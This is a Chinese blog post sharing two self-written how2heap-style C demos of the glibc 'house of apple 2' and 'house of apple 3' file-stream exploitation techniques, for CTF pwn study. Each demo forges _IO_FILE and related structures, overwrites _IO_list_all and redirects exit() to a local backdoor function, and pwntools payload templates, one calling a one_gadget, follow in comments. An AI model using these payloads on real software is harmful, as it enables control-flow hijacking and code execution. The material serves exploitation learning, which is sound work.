[自制]how2heap house of apple(2-3)

最新推荐文章于 2025-11-30 23:27:53 发布

原创最新推荐文章于 2025-11-30 23:27:53 发布 · 132 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#数据结构 #CTF #pwn #house of #demo

我写了几个house of apple的demo,供大家学习参考，欢迎批评指点。

House of apple2:

#include<unistd.h>
#include<stdlib.h>
#include<stdio.h>
int backdoor(){
	printf("\033[31m[!]backdoor is be called !\n");
	printf("\033[31m[!]program exiting!");
	return 0;
}
int main(){
	setbuf(stdin,NULL);
	setbuf(stdout,NULL);
	printf("init the programe\n");
	printf("-------------------------------how2heap house of apple 2---------------------------\n");
	printf("[*]first,you need to know the address of _IO_list_all,and modify it . make it point to our chunk\n");
	unsigned long offset_of_IO_list_all=0x21a680;
	unsigned long offset_of_puts=0x80ed0;
	unsigned long _IO_wfile_jumps_offset=0x2160c0;
	printf("[*]The adrress of puts is %p\n",&puts);
	unsigned long libc_base=(unsigned long)&puts-offset_of_puts;
	printf("[*]GNU Library base is %p\n",libc_base);
	unsigned long *_IO_list_all=libc_base+offset_of_IO_list_all;
	printf("[*]_IO_list_all address is %p.\n",_IO_list_all);
	unsigned long _wfile_jumps = libc_base+_IO_wfile_jumps_offset;
	printf("[*]_wfile_jumps address is %p.\n",_wfile_jumps);
	unsigned long *_IO_FILE = malloc(0x400);
	unsigned long *_wide_data = malloc(0x400);
	unsigned long *vtable = malloc(0x400);
	printf("[*]Step 1 : We malloc three chunks to store our data.\n[*]fake _IO_FILE address is %p\n[*]fake wide_data address is %p\n[*]fake vtable address is %p.\n",_IO_FILE,_wide_data,vtable);
	printf("[*]Step 2 : set data to fake struct\n");
	*(_IO_FILE+0x0)=0x0;//flags
	*(_IO_FILE+0x20/8)=0x0;//_IO_write_base
	*(_IO_FILE+0x28/8)=0x1;//_IO_write_ptr
	*(_IO_FILE+0xa0/8)=_wide_data;//wide_data
	*(_IO_FILE+0xc0/8)=0x1;//_mode
	*(_IO_FILE+0xd8/8)=_wfile_jumps;//vtable
	printf("[+]_IO_FILE modify ok!\n");
	*(_wide_data+0x18/8)=0x0;//_IO_write_base
	*(_wide_data+0x20/8)=0x1;//_IO_write_ptr
	*(_wide_data+0x30/8)=0x0;//_IO_buf_base
	*(_wide_data+0xe0/8)=vtable;//_IO_wfile_jumps
	printf("[+]_wide_data modify ok!\n");
	*(vtable+0x68/8)=&backdoor;//_IO_wallocate
	printf("[+]vtable modify ok!\n");
	*(_IO_list_all) = _IO_FILE;
	printf("[+]Step 3 : _IO_list_all modify ok!\n[*]New _IO_list_all is point to : %p\n",*_IO_list_all);
	char a[1];
	printf("[*]The control will fellow this chain : exit(0)->fflush()->_IO_flush_all()->_IO_OVERFLOW(modified)->_IO_wfile_OVERFLOW->_IO_wdoallocatebuf()->_IO_doallocate(modified)->backdoor\n");
	printf("[*]Press any key to continue , next step will ffush all stream . Then will execute our backdoor\n");
	read(0,a,1);
	printf("Step 4 : execute exit(0); to execute backdoor\n");
	exit(0);
	return 0;
}
/*
	payload=p32(0)#flags
	payload=payload.ljust(0x20,b"\x00")#padding
	payload+=p64(0)#_IO_write_base
	payload+=p64(1)#_IO_write_ptr
	payload=payload.ljust(0xa0,b"\x00")#padding
	payload+=p64(_IO_wide_data)#_wide_data
	payload=payload.ljust(0xc0,b"\x00")#padding
	payload+=p64(1)#_mode
	payload=payload.ljust(0xd8,b"\x00")#padding
	payload+=p64(_IO_wfile_jumps)


	_wide_data=b""
	_wide_data=_wide_data.ljust(0x18,b"\x00")
	_wide_data+=p64(0)#IO_write_base
	_wide_data+=p64(1)#IO_write_prt
	_wide_data=_wide_data.ljust(0x30,b"\x00")
	_wide_data+=p64(0)#_IO_buf_base
	_wide_data=_wide_data.ljust(0xe0,b"\x00")
	_wide_data+=p64(fake_vtable_addr)
	_vtable=b"\x00"*0x68+p64(one_gadget)

*/
//learn computer

House of apple3:

#include<unistd.h>
#include<stdlib.h>
#include<stdio.h>
#define OFFSET(VAR,NUM) *(VAR+NUM/8)
int backdoor(){
	printf("\033[31m[!]backdoor is be called !\n");
	printf("\033[31m[!]program exiting!\n");
	_exit(0);
	return 0;
}
int main(){
	setbuf(stdin,NULL);
	setbuf(stdout,NULL);
	printf("init the programe\n");
	printf("-------------------------------how2heap house of apple 3---------------------------\n");
	printf("[*]first,you need to know the address of _IO_list_all,and modify it . make it point to our chunk\n");
	unsigned long offset_of_IO_list_all=0x21a680;
	unsigned long offset_of_puts=0x80ed0;
	unsigned long _IO_wfile_jumps_offset=0x2160c0;
	printf("[*]The adrress of puts is %p\n",&puts);
	unsigned long libc_base=(unsigned long)&puts-offset_of_puts;
	printf("[*]GNU Library base is %p\n",libc_base);
	unsigned long *_IO_list_all=libc_base+offset_of_IO_list_all;
	printf("[*]_IO_list_all address is %p.\n",_IO_list_all);
	unsigned long _wfile_jumps = libc_base+_IO_wfile_jumps_offset;
	printf("[*]_wfile_jumps address is %p.\n",_wfile_jumps);
	unsigned long commen_wide_data=0x219b80+libc_base;
	printf("[*]commen _wide_data address is %p.\n",commen_wide_data);
	unsigned long *_IO_FILE = malloc(0x400);
	unsigned long *codecvt = malloc(0x400);
	unsigned long *cd_in = malloc(0x400);
	printf("[*]Step 1 : We calloc three chunks to store our data.\n[*]fake _IO_FILE address is %p\n[*]fake wide_data address is %p\n[*]cd_in address is %p.\n",_IO_FILE,codecvt,cd_in);
	printf("[*]Step 2 : set data to fake struct\n");
	OFFSET(_IO_FILE,0x8)=0;//_IO_read_ptr
	OFFSET(_IO_FILE,0x10)=1;//_IO_read_end
	OFFSET(_IO_FILE,0x28)=1;//_IO_write_ptr
	OFFSET(_IO_FILE,0x98)=codecvt;//codecvt
	OFFSET(_IO_FILE,0xa0)=commen_wide_data;//commen wide data
	OFFSET(_IO_FILE,0xd8)=_wfile_jumps+0x8;//_IO_wfile_jumps
	printf("[+]_IO_FILE modify ok!\n");
	OFFSET(codecvt,0)=cd_in;//cd_in
	printf("[+]codecvt modify ok!\n");
	OFFSET(cd_in,0)=0;//DECODE
	OFFSET(cd_in,0x28)=&backdoor;//backdoor
	printf("[+]cd_in modify ok!\n");
	OFFSET(_IO_list_all,0)=_IO_FILE;
	printf("[+]_IO_list_all modified ok!\n");
	printf("[*]Step 3 : Now when we exit , the control stream will fellow this chain : exit()->fflush()->_IO_flush_all()->_IO_OVERFLOW(modified)->_IO_wfile_UNDERFLOW->_libio_codecvt_in->DL_CALL_FCT->cd_in.fct(modified)->backdoor\n");
	char a[1];
	printf("press any key to continue......\n");
	read(0,a,1);
	exit(0);
	return 0;
}
/*
	_codecvt=b""
	_codecvt+=p64(fake__cd_in_addr)
	__cd_in=b""
	__cd_in+=p64(0)
	__cd_in=__cd_in.ljust(0x28,b"\x00")
	__cd_in+=p64(backdoor)
#house of apple 3
	payload=p64(0)#flags
	payload=payload.ljust(0x8,b"\x00")#padding
	payload+=p64(0)#_IO_read_ptr
	payload+=p64(1)#_IO_read_end
	payload=payload.ljust(0x20,b"\x00")#padding
	payload+=p64(0)#_IO_write_base
	payload+=p64(1)#_IO_write_ptr
	payload+=p64(0)#_IO_write_end
	payload=payload.ljust(0x98,b"\x00")#padding
	payload+=p64(_IO_codecvt_data)#_codecvt
	payload=payload.ljust(0xa0,b"\x00")#padding
	payload+=p64(commen_wide_data)#_wide_data
	payload=payload.ljust(0xc0,b"\x00")#padding
	payload+=p64(0)#_mode
	payload=payload.ljust(0xd8,b"\x00")#padding
	payload+=p64(_IO_wfile_jumps+0x8)#_vtable
	log_addr("_IO_wfile_jumps",_IO_wfile_jumps)

*/
//learn computer